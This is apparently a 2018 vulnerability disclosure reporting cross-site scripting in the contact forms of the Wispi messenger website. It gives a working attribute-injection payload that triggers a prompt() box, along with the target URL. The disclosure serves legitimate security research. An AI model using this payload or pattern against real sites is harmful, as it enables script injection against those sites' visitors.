Wispi messenger website Multiple XSS

2018.09.17

Credit: Ali Abdollahi

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Multiple XSS on Wispi messenger website
CWE-79
Credit: Ali Abdollahi
Remote

Description:
All input forms in "http://www.wispiapp.com/contact/" are vulnerable to cross site scripting.

Payload= 1" onmouseover=prompt("Ali") bad="

Reference: https://s33.postimg.cc/jd54ejta7/Screenshot_538.png

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Wispi messenger website Multiple XSS

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Wispi messenger website Multiple XSS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.